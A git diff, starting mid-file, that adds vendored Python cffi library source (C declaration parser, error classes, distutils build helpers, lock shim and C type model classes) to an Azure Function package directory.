hasattr(decl.init.expr, 'value') and + _r_int_literal.match(decl.init.expr.value)): + self._add_integer_constant(decl.name, + '-' + decl.init.expr.value) + elif (tp is model.void_type and + decl.name.startswith('__cffi_extern_python_')): + # hack: `extern "Python"` in the C source is replaced + # with "void __cffi_extern_python_start;" and + # "void __cffi_extern_python_stop;" + self._inside_extern_python = decl.name + else: + if self._inside_extern_python !='__cffi_extern_python_stop': + raise CDefError( + "cannot declare constants or " + "variables with 'extern \"Python\"'") + if (quals & model.Q_CONST) and not tp.is_array_type: + self._declare('constant ' + decl.name, tp, quals=quals) + else: + _warn_for_non_extern_non_static_global_variable(decl) + self._declare('variable ' + decl.name, tp, quals=quals) + + def parse_type(self, cdecl): + return self.parse_type_and_quals(cdecl)[0] + + def parse_type_and_quals(self, cdecl): + ast, macros = self._parse('void __dummy(\n%s\n);' % cdecl)[:2] + assert not macros + exprnode = ast.ext[-1].type.args.params[0] + if isinstance(exprnode, pycparser.c_ast.ID): + raise CDefError("unknown identifier '%s'" % (exprnode.name,)) + return self._get_type_and_quals(exprnode.type) + + def _declare(self, name, obj, included=False, quals=0): + if name in self._declarations: + prevobj, prevquals = self._declarations[name] + if 
prevobj is obj and prevquals == quals: + return + if not self._options.get('override'): + raise FFIError( + "multiple declarations of %s (for interactive usage, " + "try cdef(xx, override=True))" % (name,)) + assert '__dotdotdot__' not in name.split() + self._declarations[name] = (obj, quals) + if included: + self._included_declarations.add(obj) + + def _extract_quals(self, type): + quals = 0 + if isinstance(type, (pycparser.c_ast.TypeDecl, + pycparser.c_ast.PtrDecl)): + if 'const' in type.quals: + quals |= model.Q_CONST + if 'volatile' in type.quals: + quals |= model.Q_VOLATILE + if 'restrict' in type.quals: + quals |= model.Q_RESTRICT + return quals + + def _get_type_pointer(self, type, quals, declname=None): + if isinstance(type, model.RawFunctionType): + return type.as_function_pointer() + if (isinstance(type, model.StructOrUnionOrEnum) and + type.name.startswith('$') and type.name[1:].isdigit() and + type.forcename is None and declname is not None): + return model.NamedPointerType(type, declname, quals) + return model.PointerType(type, quals) + + def _get_type_and_quals(self, typenode, name=None, partial_length_ok=False, + typedef_example=None): + # first, dereference typedefs, if we have it already parsed, we're good + if (isinstance(typenode, pycparser.c_ast.TypeDecl) and + isinstance(typenode.type, pycparser.c_ast.IdentifierType) and + len(typenode.type.names) == 1 and + ('typedef ' + typenode.type.names[0]) in self._declarations): + tp, quals = self._declarations['typedef ' + typenode.type.names[0]] + quals |= self._extract_quals(typenode) + return tp, quals + # + if isinstance(typenode, pycparser.c_ast.ArrayDecl): + # array type + if typenode.dim is None: + length = None + else: + length = self._parse_constant( + typenode.dim, partial_length_ok=partial_length_ok) + # a hack: in 'typedef int foo_t[...][...];', don't use '...' as + # the length but use directly the C expression that would be + # generated by recompiler.py. This lets the typedef be used in + # many more places within recompiler.py + if typedef_example is not None: + if length == '...': + length = '_cffi_array_len(%s)' % (typedef_example,) + typedef_example = "*" + typedef_example + # + tp, quals = self._get_type_and_quals(typenode.type, + partial_length_ok=partial_length_ok, + typedef_example=typedef_example) + return model.ArrayType(tp, length), quals + # + if isinstance(typenode, pycparser.c_ast.PtrDecl): + # pointer type + itemtype, itemquals = self._get_type_and_quals(typenode.type) + tp = self._get_type_pointer(itemtype, itemquals, declname=name) + quals = self._extract_quals(typenode) + return tp, quals + # + if isinstance(typenode, pycparser.c_ast.TypeDecl): + quals = self._extract_quals(typenode) + type = typenode.type + if isinstance(type, pycparser.c_ast.IdentifierType): + # assume a primitive type. 
get it from .names, but reduce + # synonyms to a single chosen combination + names = list(type.names) + if names != ['signed', 'char']: # keep this unmodified + prefixes = {} + while names: + name = names[0] + if name in ('short', 'long', 'signed', 'unsigned'): + prefixes[name] = prefixes.get(name, 0) + 1 + del names[0] + else: + break + # ignore the 'signed' prefix below, and reorder the others + newnames = [] + for prefix in ('unsigned', 'short', 'long'): + for i in range(prefixes.get(prefix, 0)): + newnames.append(prefix) + if not names: + names = ['int'] # implicitly + if names == ['int']: # but kill it if 'short' or 'long' + if 'short' in prefixes or 'long' in prefixes: + names = [] + names = newnames + names + ident = ' '.join(names) + if ident == 'void': + return model.void_type, quals + if ident == '__dotdotdot__': + raise FFIError(':%d: bad usage of "..."' % + typenode.coord.line) + tp0, quals0 = resolve_common_type(self, ident) + return tp0, (quals | quals0) + # + if isinstance(type, pycparser.c_ast.Struct): + # 'struct foobar' + tp = self._get_struct_union_enum_type('struct', type, name) + return tp, quals + # + if isinstance(type, pycparser.c_ast.Union): + # 'union foobar' + tp = self._get_struct_union_enum_type('union', type, name) + return tp, quals + # + if isinstance(type, pycparser.c_ast.Enum): + # 'enum foobar' + tp = self._get_struct_union_enum_type('enum', type, name) + return tp, quals + # + if isinstance(typenode, pycparser.c_ast.FuncDecl): + # a function type + return self._parse_function_type(typenode, name), 0 + # + # nested anonymous structs or unions end up here + if isinstance(typenode, pycparser.c_ast.Struct): + return self._get_struct_union_enum_type('struct', typenode, name, + nested=True), 0 + if isinstance(typenode, pycparser.c_ast.Union): + return self._get_struct_union_enum_type('union', typenode, name, + nested=True), 0 + # + raise FFIError(":%d: bad or unsupported type declaration" % + typenode.coord.line) + + def _parse_function_type(self, typenode, funcname=None): + params = list(getattr(typenode.args, 'params', [])) + for i, arg in enumerate(params): + if not hasattr(arg, 'type'): + raise CDefError("%s arg %d: unknown type '%s'" + " (if you meant to use the old C syntax of giving" + " untyped arguments, it is not supported)" + % (funcname or 'in expression', i + 1, + getattr(arg, 'name', '?'))) + ellipsis = ( + len(params) > 0 and + isinstance(params[-1].type, pycparser.c_ast.TypeDecl) and + isinstance(params[-1].type.type, + pycparser.c_ast.IdentifierType) and + params[-1].type.type.names == ['__dotdotdot__']) + if ellipsis: + params.pop() + if not params: + raise CDefError( + "%s: a function with only '(...)' as argument" + " is not correct C" % (funcname or 'in expression')) + args = [self._as_func_arg(*self._get_type_and_quals(argdeclnode.type)) + for argdeclnode in params] + if not ellipsis and args == [model.void_type]: + args = [] + result, quals = self._get_type_and_quals(typenode.type) + # the 'quals' on the result type are ignored. HACK: we absure them + # to detect __stdcall functions: we textually replace "__stdcall" + # with "volatile volatile const" above. 
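+        # Editor's illustration (not upstream cffi text): given
+        #     cdef("int __stdcall f(long);")
+        # the textual replacement described above makes pycparser see
+        #     int volatile volatile const f(long);
+        # so the result type's quals end in ['volatile', 'volatile',
+        # 'const'] and the check below reports abi = '__stdcall'.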
+ abi = None + if hasattr(typenode.type, 'quals'): # else, probable syntax error anyway + if typenode.type.quals[-3:] == ['volatile', 'volatile', 'const']: + abi = '__stdcall' + return model.RawFunctionType(tuple(args), result, ellipsis, abi) + + def _as_func_arg(self, type, quals): + if isinstance(type, model.ArrayType): + return model.PointerType(type.item, quals) + elif isinstance(type, model.RawFunctionType): + return type.as_function_pointer() + else: + return type + + def _get_struct_union_enum_type(self, kind, type, name=None, nested=False): + # First, a level of caching on the exact 'type' node of the AST. + # This is obscure, but needed because pycparser "unrolls" declarations + # such as "typedef struct { } foo_t, *foo_p" and we end up with + # an AST that is not a tree, but a DAG, with the "type" node of the + # two branches foo_t and foo_p of the trees being the same node. + # It's a bit silly but detecting "DAG-ness" in the AST tree seems + # to be the only way to distinguish this case from two independent + # structs. See test_struct_with_two_usages. + try: + return self._structnode2type[type] + except KeyError: + pass + # + # Note that this must handle parsing "struct foo" any number of + # times and always return the same StructType object. Additionally, + # one of these times (not necessarily the first), the fields of + # the struct can be specified with "struct foo { ...fields... }". + # If no name is given, then we have to create a new anonymous struct + # with no caching; in this case, the fields are either specified + # right now or never. + # + force_name = name + name = type.name + # + # get the type or create it if needed + if name is None: + # 'force_name' is used to guess a more readable name for + # anonymous structs, for the common case "typedef struct { } foo". + if force_name is not None: + explicit_name = '$%s' % force_name + else: + self._anonymous_counter += 1 + explicit_name = '$%d' % self._anonymous_counter + tp = None + else: + explicit_name = name + key = '%s %s' % (kind, name) + tp, _ = self._declarations.get(key, (None, None)) + # + if tp is None: + if kind == 'struct': + tp = model.StructType(explicit_name, None, None, None) + elif kind == 'union': + tp = model.UnionType(explicit_name, None, None, None) + elif kind == 'enum': + if explicit_name == '__dotdotdot__': + raise CDefError("Enums cannot be declared with ...") + tp = self._build_enum_type(explicit_name, type.values) + else: + raise AssertionError("kind = %r" % (kind,)) + if name is not None: + self._declare(key, tp) + else: + if kind == 'enum' and type.values is not None: + raise NotImplementedError( + "enum %s: the '{}' declaration should appear on the first " + "time the enum is mentioned, not later" % explicit_name) + if not tp.forcename: + tp.force_the_name(force_name) + if tp.forcename and '$' in tp.name: + self._declare('anonymous %s' % tp.forcename, tp) + # + self._structnode2type[type] = tp + # + # enums: done here + if kind == 'enum': + return tp + # + # is there a 'type.decls'? If yes, then this is the place in the + # C sources that declare the fields. If no, then just return the + # existing type, possibly still incomplete. 
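+        # Editor's illustration (not upstream cffi text): cdef("struct foo;")
+        # reaches this point with type.decls == None and returns an opaque
+        # StructType (fldnames is None); a later cdef("struct foo { int x; };")
+        # gets the same cached object back and fills in its fields below.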
+ if type.decls is None: + return tp + # + if tp.fldnames is not None: + raise CDefError("duplicate declaration of struct %s" % name) + fldnames = [] + fldtypes = [] + fldbitsize = [] + fldquals = [] + for decl in type.decls: + if (isinstance(decl.type, pycparser.c_ast.IdentifierType) and + ''.join(decl.type.names) == '__dotdotdot__'): + # XXX pycparser is inconsistent: 'names' should be a list + # of strings, but is sometimes just one string. Use + # str.join() as a way to cope with both. + self._make_partial(tp, nested) + continue + if decl.bitsize is None: + bitsize = -1 + else: + bitsize = self._parse_constant(decl.bitsize) + self._partial_length = False + type, fqual = self._get_type_and_quals(decl.type, + partial_length_ok=True) + if self._partial_length: + self._make_partial(tp, nested) + if isinstance(type, model.StructType) and type.partial: + self._make_partial(tp, nested) + fldnames.append(decl.name or '') + fldtypes.append(type) + fldbitsize.append(bitsize) + fldquals.append(fqual) + tp.fldnames = tuple(fldnames) + tp.fldtypes = tuple(fldtypes) + tp.fldbitsize = tuple(fldbitsize) + tp.fldquals = tuple(fldquals) + if fldbitsize != [-1] * len(fldbitsize): + if isinstance(tp, model.StructType) and tp.partial: + raise NotImplementedError("%s: using both bitfields and '...;'" + % (tp,)) + tp.packed = self._options.get('packed') + if tp.completed: # must be re-completed: it is not opaque any more + tp.completed = 0 + self._recomplete.append(tp) + return tp + + def _make_partial(self, tp, nested): + if not isinstance(tp, model.StructOrUnion): + raise CDefError("%s cannot be partial" % (tp,)) + if not tp.has_c_name() and not nested: + raise NotImplementedError("%s is partial but has no C name" %(tp,)) + tp.partial = True + + def _parse_constant(self, exprnode, partial_length_ok=False): + # for now, limited to expressions that are an immediate number + # or positive/negative number + if isinstance(exprnode, pycparser.c_ast.Constant): + s = exprnode.value + if '0' <= s[0] <= '9': + s = s.rstrip('uUlL') + try: + if s.startswith('0'): + return int(s, 8) + else: + return int(s, 10) + except ValueError: + if len(s) > 1: + if s.lower()[0:2] == '0x': + return int(s, 16) + elif s.lower()[0:2] == '0b': + return int(s, 2) + raise CDefError("invalid constant %r" % (s,)) + elif s[0] == "'" and s[-1] == "'" and ( + len(s) == 3 or (len(s) == 4 and s[1] == "\\")): + return ord(s[-2]) + else: + raise CDefError("invalid constant %r" % (s,)) + # + if (isinstance(exprnode, pycparser.c_ast.UnaryOp) and + exprnode.op == '+'): + return self._parse_constant(exprnode.expr) + # + if (isinstance(exprnode, pycparser.c_ast.UnaryOp) and + exprnode.op == '-'): + return -self._parse_constant(exprnode.expr) + # load previously defined int constant + if (isinstance(exprnode, pycparser.c_ast.ID) and + exprnode.name in self._int_constants): + return self._int_constants[exprnode.name] + # + if (isinstance(exprnode, pycparser.c_ast.ID) and + exprnode.name == '__dotdotdotarray__'): + if partial_length_ok: + self._partial_length = True + return '...' 
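+        # Editor's note (not upstream cffi text): callers that can resolve
+        # a '[...]' length later (struct fields, typedefs, top-level
+        # declarations) pass partial_length_ok=True; other contexts,
+        # e.g. an array in a function argument list, fall through to the
+        # error below.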
+ raise FFIError(":%d: unsupported '[...]' here, cannot derive " + "the actual array length in this context" + % exprnode.coord.line) + # + if isinstance(exprnode, pycparser.c_ast.BinaryOp): + left = self._parse_constant(exprnode.left) + right = self._parse_constant(exprnode.right) + if exprnode.op == '+': + return left + right + elif exprnode.op == '-': + return left - right + elif exprnode.op == '*': + return left * right + elif exprnode.op == '/': + return self._c_div(left, right) + elif exprnode.op == '%': + return left - self._c_div(left, right) * right + elif exprnode.op == '<<': + return left << right + elif exprnode.op == '>>': + return left >> right + elif exprnode.op == '&': + return left & right + elif exprnode.op == '|': + return left | right + elif exprnode.op == '^': + return left ^ right + # + raise FFIError(":%d: unsupported expression: expected a " + "simple numeric constant" % exprnode.coord.line) + + def _c_div(self, a, b): + result = a // b + if ((a < 0) ^ (b < 0)) and (a % b) != 0: + result += 1 + return result + + def _build_enum_type(self, explicit_name, decls): + if decls is not None: + partial = False + enumerators = [] + enumvalues = [] + nextenumvalue = 0 + for enum in decls.enumerators: + if _r_enum_dotdotdot.match(enum.name): + partial = True + continue + if enum.value is not None: + nextenumvalue = self._parse_constant(enum.value) + enumerators.append(enum.name) + enumvalues.append(nextenumvalue) + self._add_constants(enum.name, nextenumvalue) + nextenumvalue += 1 + enumerators = tuple(enumerators) + enumvalues = tuple(enumvalues) + tp = model.EnumType(explicit_name, enumerators, enumvalues) + tp.partial = partial + else: # opaque enum + tp = model.EnumType(explicit_name, (), ()) + return tp + + def include(self, other): + for name, (tp, quals) in other._declarations.items(): + if name.startswith('anonymous $enum_$'): + continue # fix for test_anonymous_enum_include + kind = name.split(' ', 1)[0] + if kind in ('struct', 'union', 'enum', 'anonymous', 'typedef'): + self._declare(name, tp, included=True, quals=quals) + for k, v in other._int_constants.items(): + self._add_constants(k, v) + + def _get_unknown_type(self, decl): + typenames = decl.type.type.names + if typenames == ['__dotdotdot__']: + return model.unknown_type(decl.name) + + if typenames == ['__dotdotdotint__']: + if self._uses_new_feature is None: + self._uses_new_feature = "'typedef int... %s'" % decl.name + return model.UnknownIntegerType(decl.name) + + if typenames == ['__dotdotdotfloat__']: + # note: not for 'long double' so far + if self._uses_new_feature is None: + self._uses_new_feature = "'typedef float... %s'" % decl.name + return model.UnknownFloatType(decl.name) + + raise FFIError(':%d: unsupported usage of "..." in typedef' + % decl.coord.line) + + def _get_unknown_ptr_type(self, decl): + if decl.type.type.type.names == ['__dotdotdot__']: + return model.unknown_ptr_type(decl.name) + raise FFIError(':%d: unsupported usage of "..." 
in typedef' + % decl.coord.line) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/error.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/error.py new file mode 100644 index 0000000..0f8f406 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/error.py @@ -0,0 +1,31 @@ + +class FFIError(Exception): + __module__ = 'cffi' + +class CDefError(Exception): + __module__ = 'cffi' + def __str__(self): + try: + current_decl = self.args[1] + filename = current_decl.coord.file + linenum = current_decl.coord.line + prefix = '%s:%d: ' % (filename, linenum) + except (AttributeError, TypeError, IndexError): + prefix = '' + return '%s%s' % (prefix, self.args[0]) + +class VerificationError(Exception): + """ An error raised when verification fails + """ + __module__ = 'cffi' + +class VerificationMissing(Exception): + """ An error raised when incomplete structures are passed into + cdef, but no verification has been done + """ + __module__ = 'cffi' + +class PkgConfigError(Exception): + """ An error raised for missing modules in pkg-config + """ + __module__ = 'cffi' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/ffiplatform.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/ffiplatform.py new file mode 100644 index 0000000..0feab6e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/ffiplatform.py @@ -0,0 +1,127 @@ +import sys, os +from .error import VerificationError + + +LIST_OF_FILE_NAMES = ['sources', 'include_dirs', 'library_dirs', + 'extra_objects', 'depends'] + +def get_extension(srcfilename, modname, sources=(), **kwds): + _hack_at_distutils() + from distutils.core import Extension + allsources = [srcfilename] + for src in sources: + allsources.append(os.path.normpath(src)) + return Extension(name=modname, sources=allsources, **kwds) + +def compile(tmpdir, ext, compiler_verbose=0, debug=None): + """Compile a C extension module using distutils.""" + + _hack_at_distutils() + saved_environ = os.environ.copy() + try: + outputfilename = _build(tmpdir, ext, compiler_verbose, debug) + outputfilename = os.path.abspath(outputfilename) + finally: + # workaround for a distutils bugs where some env vars can + # become longer and longer every time it is used + for key, value in saved_environ.items(): + if os.environ.get(key) != value: + os.environ[key] = value + return outputfilename + +def _build(tmpdir, ext, compiler_verbose=0, debug=None): + # XXX compact but horrible :-( + from distutils.core import Distribution + import distutils.errors, distutils.log + # + dist = Distribution({'ext_modules': [ext]}) + dist.parse_config_files() + options = dist.get_option_dict('build_ext') + if debug is None: + debug = sys.flags.debug + options['debug'] = ('ffiplatform', debug) + options['force'] = ('ffiplatform', True) + options['build_lib'] = ('ffiplatform', tmpdir) + options['build_temp'] = ('ffiplatform', tmpdir) + # + try: + old_level = distutils.log.set_threshold(0) or 0 + try: + distutils.log.set_verbosity(compiler_verbose) + dist.run_command('build_ext') + cmd_obj = dist.get_command_obj('build_ext') + [soname] = cmd_obj.get_outputs() + finally: + distutils.log.set_threshold(old_level) + except (distutils.errors.CompileError, + distutils.errors.LinkError) as e: + raise VerificationError('%s: %s' % (e.__class__.__name__, e)) + # 
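+    # Editor's note (not upstream cffi text): build_ext lists every file it
+    # produced; the [soname] unpacking above asserts there is exactly one,
+    # the compiled extension module returned to the caller.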
+ return soname + +try: + from os.path import samefile +except ImportError: + def samefile(f1, f2): + return os.path.abspath(f1) == os.path.abspath(f2) + +def maybe_relative_path(path): + if not os.path.isabs(path): + return path # already relative + dir = path + names = [] + while True: + prevdir = dir + dir, name = os.path.split(prevdir) + if dir == prevdir or not dir: + return path # failed to make it relative + names.append(name) + try: + if samefile(dir, os.curdir): + names.reverse() + return os.path.join(*names) + except OSError: + pass + +# ____________________________________________________________ + +try: + int_or_long = (int, long) + import cStringIO +except NameError: + int_or_long = int # Python 3 + import io as cStringIO + +def _flatten(x, f): + if isinstance(x, str): + f.write('%ds%s' % (len(x), x)) + elif isinstance(x, dict): + keys = sorted(x.keys()) + f.write('%dd' % len(keys)) + for key in keys: + _flatten(key, f) + _flatten(x[key], f) + elif isinstance(x, (list, tuple)): + f.write('%dl' % len(x)) + for value in x: + _flatten(value, f) + elif isinstance(x, int_or_long): + f.write('%di' % (x,)) + else: + raise TypeError( + "the keywords to verify() contains unsupported object %r" % (x,)) + +def flatten(x): + f = cStringIO.StringIO() + _flatten(x, f) + return f.getvalue() + +def _hack_at_distutils(): + # Windows-only workaround for some configurations: see + # https://bugs.python.org/issue23246 (Python 2.7 with + # a specific MS compiler suite download) + if sys.platform == "win32": + try: + import setuptools # for side-effects, patches distutils + except ImportError: + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/lock.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/lock.py new file mode 100644 index 0000000..2e40ed8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/lock.py @@ -0,0 +1,30 @@ +import sys + +if sys.version_info < (3,): + try: + from thread import allocate_lock + except ImportError: + from dummy_thread import allocate_lock +else: + try: + from _thread import allocate_lock + except ImportError: + from _dummy_thread import allocate_lock + + +##import sys +##l1 = allocate_lock + +##class allocate_lock(object): +## def __init__(self): +## self._real = l1() +## def __enter__(self): +## for i in range(4, 0, -1): +## print sys._getframe(i).f_code +## print +## return self._real.__enter__() +## def __exit__(self, *args): +## return self._real.__exit__(*args) +## def acquire(self, f): +## assert f is False +## return self._real.acquire(f) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/model.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/model.py new file mode 100644 index 0000000..065e8c0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/model.py @@ -0,0 +1,617 @@ +import types +import weakref + +from .lock import allocate_lock +from .error import CDefError, VerificationError, VerificationMissing + +# type qualifiers +Q_CONST = 0x01 +Q_RESTRICT = 0x02 +Q_VOLATILE = 0x04 + +def qualify(quals, replace_with): + if quals & Q_CONST: + replace_with = ' const ' + replace_with.lstrip() + if quals & Q_VOLATILE: + replace_with = ' volatile ' + replace_with.lstrip() + if quals & Q_RESTRICT: + # It seems that __restrict is supported by gcc and msvc. 
+ # If you hit some different compiler, add a #define in + # _cffi_include.h for it (and in its copies, documented there) + replace_with = ' __restrict ' + replace_with.lstrip() + return replace_with + + +class BaseTypeByIdentity(object): + is_array_type = False + is_raw_function = False + + def get_c_name(self, replace_with='', context='a C file', quals=0): + result = self.c_name_with_marker + assert result.count('&') == 1 + # some logic duplication with ffi.getctype()... :-( + replace_with = replace_with.strip() + if replace_with: + if replace_with.startswith('*') and '&[' in result: + replace_with = '(%s)' % replace_with + elif not replace_with[0] in '[(': + replace_with = ' ' + replace_with + replace_with = qualify(quals, replace_with) + result = result.replace('&', replace_with) + if '$' in result: + raise VerificationError( + "cannot generate '%s' in %s: unknown type name" + % (self._get_c_name(), context)) + return result + + def _get_c_name(self): + return self.c_name_with_marker.replace('&', '') + + def has_c_name(self): + return '$' not in self._get_c_name() + + def is_integer_type(self): + return False + + def get_cached_btype(self, ffi, finishlist, can_delay=False): + try: + BType = ffi._cached_btypes[self] + except KeyError: + BType = self.build_backend_type(ffi, finishlist) + BType2 = ffi._cached_btypes.setdefault(self, BType) + assert BType2 is BType + return BType + + def __repr__(self): + return '<%s>' % (self._get_c_name(),) + + def _get_items(self): + return [(name, getattr(self, name)) for name in self._attrs_] + + +class BaseType(BaseTypeByIdentity): + + def __eq__(self, other): + return (self.__class__ == other.__class__ and + self._get_items() == other._get_items()) + + def __ne__(self, other): + return not self == other + + def __hash__(self): + return hash((self.__class__, tuple(self._get_items()))) + + +class VoidType(BaseType): + _attrs_ = () + + def __init__(self): + self.c_name_with_marker = 'void&' + + def build_backend_type(self, ffi, finishlist): + return global_cache(self, ffi, 'new_void_type') + +void_type = VoidType() + + +class BasePrimitiveType(BaseType): + def is_complex_type(self): + return False + + +class PrimitiveType(BasePrimitiveType): + _attrs_ = ('name',) + + ALL_PRIMITIVE_TYPES = { + 'char': 'c', + 'short': 'i', + 'int': 'i', + 'long': 'i', + 'long long': 'i', + 'signed char': 'i', + 'unsigned char': 'i', + 'unsigned short': 'i', + 'unsigned int': 'i', + 'unsigned long': 'i', + 'unsigned long long': 'i', + 'float': 'f', + 'double': 'f', + 'long double': 'f', + 'float _Complex': 'j', + 'double _Complex': 'j', + '_Bool': 'i', + # the following types are not primitive in the C sense + 'wchar_t': 'c', + 'char16_t': 'c', + 'char32_t': 'c', + 'int8_t': 'i', + 'uint8_t': 'i', + 'int16_t': 'i', + 'uint16_t': 'i', + 'int32_t': 'i', + 'uint32_t': 'i', + 'int64_t': 'i', + 'uint64_t': 'i', + 'int_least8_t': 'i', + 'uint_least8_t': 'i', + 'int_least16_t': 'i', + 'uint_least16_t': 'i', + 'int_least32_t': 'i', + 'uint_least32_t': 'i', + 'int_least64_t': 'i', + 'uint_least64_t': 'i', + 'int_fast8_t': 'i', + 'uint_fast8_t': 'i', + 'int_fast16_t': 'i', + 'uint_fast16_t': 'i', + 'int_fast32_t': 'i', + 'uint_fast32_t': 'i', + 'int_fast64_t': 'i', + 'uint_fast64_t': 'i', + 'intptr_t': 'i', + 'uintptr_t': 'i', + 'intmax_t': 'i', + 'uintmax_t': 'i', + 'ptrdiff_t': 'i', + 'size_t': 'i', + 'ssize_t': 'i', + } + + def __init__(self, name): + assert name in self.ALL_PRIMITIVE_TYPES + self.name = name + self.c_name_with_marker = name + '&' + + def is_char_type(self): + 
return self.ALL_PRIMITIVE_TYPES[self.name] == 'c' + def is_integer_type(self): + return self.ALL_PRIMITIVE_TYPES[self.name] == 'i' + def is_float_type(self): + return self.ALL_PRIMITIVE_TYPES[self.name] == 'f' + def is_complex_type(self): + return self.ALL_PRIMITIVE_TYPES[self.name] == 'j' + + def build_backend_type(self, ffi, finishlist): + return global_cache(self, ffi, 'new_primitive_type', self.name) + + +class UnknownIntegerType(BasePrimitiveType): + _attrs_ = ('name',) + + def __init__(self, name): + self.name = name + self.c_name_with_marker = name + '&' + + def is_integer_type(self): + return True + + def build_backend_type(self, ffi, finishlist): + raise NotImplementedError("integer type '%s' can only be used after " + "compilation" % self.name) + +class UnknownFloatType(BasePrimitiveType): + _attrs_ = ('name', ) + + def __init__(self, name): + self.name = name + self.c_name_with_marker = name + '&' + + def build_backend_type(self, ffi, finishlist): + raise NotImplementedError("float type '%s' can only be used after " + "compilation" % self.name) + + +class BaseFunctionType(BaseType): + _attrs_ = ('args', 'result', 'ellipsis', 'abi') + + def __init__(self, args, result, ellipsis, abi=None): + self.args = args + self.result = result + self.ellipsis = ellipsis + self.abi = abi + # + reprargs = [arg._get_c_name() for arg in self.args] + if self.ellipsis: + reprargs.append('...') + reprargs = reprargs or ['void'] + replace_with = self._base_pattern % (', '.join(reprargs),) + if abi is not None: + replace_with = replace_with[:1] + abi + ' ' + replace_with[1:] + self.c_name_with_marker = ( + self.result.c_name_with_marker.replace('&', replace_with)) + + +class RawFunctionType(BaseFunctionType): + # Corresponds to a C type like 'int(int)', which is the C type of + # a function, but not a pointer-to-function. The backend has no + # notion of such a type; it's used temporarily by parsing. 
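+    # Editor's illustration (not upstream cffi text): with this pattern the
+    # C type 'int(int)' renders from the result marker 'int&' as
+    # 'int(&)(int)'; as_function_pointer() below switches to
+    # FunctionPtrType, whose '(*&)(%s)' pattern renders 'int(*&)(int)'.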
+ _base_pattern = '(&)(%s)' + is_raw_function = True + + def build_backend_type(self, ffi, finishlist): + raise CDefError("cannot render the type %r: it is a function " + "type, not a pointer-to-function type" % (self,)) + + def as_function_pointer(self): + return FunctionPtrType(self.args, self.result, self.ellipsis, self.abi) + + +class FunctionPtrType(BaseFunctionType): + _base_pattern = '(*&)(%s)' + + def build_backend_type(self, ffi, finishlist): + result = self.result.get_cached_btype(ffi, finishlist) + args = [] + for tp in self.args: + args.append(tp.get_cached_btype(ffi, finishlist)) + abi_args = () + if self.abi == "__stdcall": + if not self.ellipsis: # __stdcall ignored for variadic funcs + try: + abi_args = (ffi._backend.FFI_STDCALL,) + except AttributeError: + pass + return global_cache(self, ffi, 'new_function_type', + tuple(args), result, self.ellipsis, *abi_args) + + def as_raw_function(self): + return RawFunctionType(self.args, self.result, self.ellipsis, self.abi) + + +class PointerType(BaseType): + _attrs_ = ('totype', 'quals') + + def __init__(self, totype, quals=0): + self.totype = totype + self.quals = quals + extra = qualify(quals, " *&") + if totype.is_array_type: + extra = "(%s)" % (extra.lstrip(),) + self.c_name_with_marker = totype.c_name_with_marker.replace('&', extra) + + def build_backend_type(self, ffi, finishlist): + BItem = self.totype.get_cached_btype(ffi, finishlist, can_delay=True) + return global_cache(self, ffi, 'new_pointer_type', BItem) + +voidp_type = PointerType(void_type) + +def ConstPointerType(totype): + return PointerType(totype, Q_CONST) + +const_voidp_type = ConstPointerType(void_type) + + +class NamedPointerType(PointerType): + _attrs_ = ('totype', 'name') + + def __init__(self, totype, name, quals=0): + PointerType.__init__(self, totype, quals) + self.name = name + self.c_name_with_marker = name + '&' + + +class ArrayType(BaseType): + _attrs_ = ('item', 'length') + is_array_type = True + + def __init__(self, item, length): + self.item = item + self.length = length + # + if length is None: + brackets = '&[]' + elif length == '...': + brackets = '&[/*...*/]' + else: + brackets = '&[%s]' % length + self.c_name_with_marker = ( + self.item.c_name_with_marker.replace('&', brackets)) + + def length_is_unknown(self): + return isinstance(self.length, str) + + def resolve_length(self, newlength): + return ArrayType(self.item, newlength) + + def build_backend_type(self, ffi, finishlist): + if self.length_is_unknown(): + raise CDefError("cannot render the type %r: unknown length" % + (self,)) + self.item.get_cached_btype(ffi, finishlist) # force the item BType + BPtrItem = PointerType(self.item).get_cached_btype(ffi, finishlist) + return global_cache(self, ffi, 'new_array_type', BPtrItem, self.length) + +char_array_type = ArrayType(PrimitiveType('char'), None) + + +class StructOrUnionOrEnum(BaseTypeByIdentity): + _attrs_ = ('name',) + forcename = None + + def build_c_name_with_marker(self): + name = self.forcename or '%s %s' % (self.kind, self.name) + self.c_name_with_marker = name + '&' + + def force_the_name(self, forcename): + self.forcename = forcename + self.build_c_name_with_marker() + + def get_official_name(self): + assert self.c_name_with_marker.endswith('&') + return self.c_name_with_marker[:-1] + + +class StructOrUnion(StructOrUnionOrEnum): + fixedlayout = None + completed = 0 + partial = False + packed = 0 + + def __init__(self, name, fldnames, fldtypes, fldbitsize, fldquals=None): + self.name = name + self.fldnames = fldnames + 
self.fldtypes = fldtypes + self.fldbitsize = fldbitsize + self.fldquals = fldquals + self.build_c_name_with_marker() + + def anonymous_struct_fields(self): + if self.fldtypes is not None: + for name, type in zip(self.fldnames, self.fldtypes): + if name == '' and isinstance(type, StructOrUnion): + yield type + + def enumfields(self, expand_anonymous_struct_union=True): + fldquals = self.fldquals + if fldquals is None: + fldquals = (0,) * len(self.fldnames) + for name, type, bitsize, quals in zip(self.fldnames, self.fldtypes, + self.fldbitsize, fldquals): + if (name == '' and isinstance(type, StructOrUnion) + and expand_anonymous_struct_union): + # nested anonymous struct/union + for result in type.enumfields(): + yield result + else: + yield (name, type, bitsize, quals) + + def force_flatten(self): + # force the struct or union to have a declaration that lists + # directly all fields returned by enumfields(), flattening + # nested anonymous structs/unions. + names = [] + types = [] + bitsizes = [] + fldquals = [] + for name, type, bitsize, quals in self.enumfields(): + names.append(name) + types.append(type) + bitsizes.append(bitsize) + fldquals.append(quals) + 